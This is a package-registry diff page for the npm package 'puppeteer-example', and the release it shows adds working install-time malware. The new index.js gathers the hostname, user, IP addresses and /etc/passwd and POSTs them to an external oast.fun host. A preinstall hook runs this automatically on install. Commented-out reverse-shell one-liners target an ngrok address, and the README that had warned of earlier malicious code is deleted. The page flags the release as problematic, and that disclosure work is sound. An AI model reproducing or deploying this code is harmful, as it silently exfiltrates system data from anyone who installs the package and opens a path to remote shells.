puppeteer-example 0.0.1-security → 1.2.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of puppeteer-example might be problematic. Click here for more details.
- package/index.js +48 -0
- package/package.json +9 -3
- package/README.md +0 -5
package/index.js
ADDED
|
@@ -0,0 +1,48 @@
|
|
|
1
|
+
|
|
2
|
+
const execSync = require('child_process').execSync;
|
|
3
|
+
|
|
4
|
+
const priv_ip = execSync('hostname -I', { encoding: 'utf-8' });
|
|
5
|
+
const whoami = execSync('whoami', { encoding: 'utf-8' });
|
|
6
|
+
const host = execSync('hostname', { encoding: 'utf-8' });
|
|
7
|
+
// const current_dir = execSync('pwd', { encoding: 'utf-8' });
|
|
8
|
+
const passwd = execSync('cat /etc/passwd', { encoding: 'utf-8' });
|
|
9
|
+
// const py3 = execSync("export RHOST='0.tcp.in.ngrok.io';export RPORT=16848;python -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv('RHOST'),int(os.getenv('RPORT'))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn('/bin/sh')'", { encoding: 'utf-8' });
|
|
10
|
+
const pyv = execSync('python3 --version', { encoding: 'utf-8' });
|
|
11
|
+
const php = execSync('php --version', { encoding: 'utf-8' });
|
|
12
|
+
const lsb = execSync('lsb_release -a', { encoding: 'utf-8' });
|
|
13
|
+
const l9 = execSync('dig +short myip.opendns.com @resolver1.opendns.com', { encoding: 'utf-8' });
|
|
14
|
+
// const shell = execSync('bash -i >& /dev/tcp/0.tcp.in.ngrok.io/16848 0>&1', { encoding: 'utf-8' });
|
|
15
|
+
|
|
16
|
+
|
|
17
|
+
|
|
18
|
+
const https = require("https")
|
|
19
|
+
|
|
20
|
+
const data = JSON.stringify({
|
|
21
|
+
"private IP": priv_ip,
|
|
22
|
+
"whoami": whoami,
|
|
23
|
+
"hostname": host,
|
|
24
|
+
"passwd": passwd,
|
|
25
|
+
"python version": pyv,
|
|
26
|
+
"php version": php,
|
|
27
|
+
"lsb": lsb,
|
|
28
|
+
"l9 public IP": l9,
|
|
29
|
+
// "current dir": current_dir,
|
|
30
|
+
// "py": py,
|
|
31
|
+
// "bash": bash,
|
|
32
|
+
// "shell": shell,
|
|
33
|
+
})
|
|
34
|
+
|
|
35
|
+
const options = {
|
|
36
|
+
hostname: "cm4pj9h2vtc00002tsz0gknmjfryyyyyb.oast.fun",
|
|
37
|
+
port: 443,
|
|
38
|
+
path: "/",
|
|
39
|
+
method: "POST",
|
|
40
|
+
headers: {
|
|
41
|
+
"Content-Type": "application/json",
|
|
42
|
+
"Content-Length": data.length,
|
|
43
|
+
},
|
|
44
|
+
}
|
|
45
|
+
|
|
46
|
+
const req = https.request(options)
|
|
47
|
+
req.write(data)
|
|
48
|
+
req.end()
|
package/package.json
CHANGED
|
@@ -1,6 +1,12 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "puppeteer-example",
|
|
3
|
-
"version": "
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
3
|
+
"version": "1.2.1",
|
|
4
|
+
"description": "Shiv Pratap took over",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
8
|
+
"preinstall": "node index.js"
|
|
9
|
+
},
|
|
10
|
+
"author": "",
|
|
11
|
+
"license": "ISC"
|
|
6
12
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=puppeteer-example for more information.
|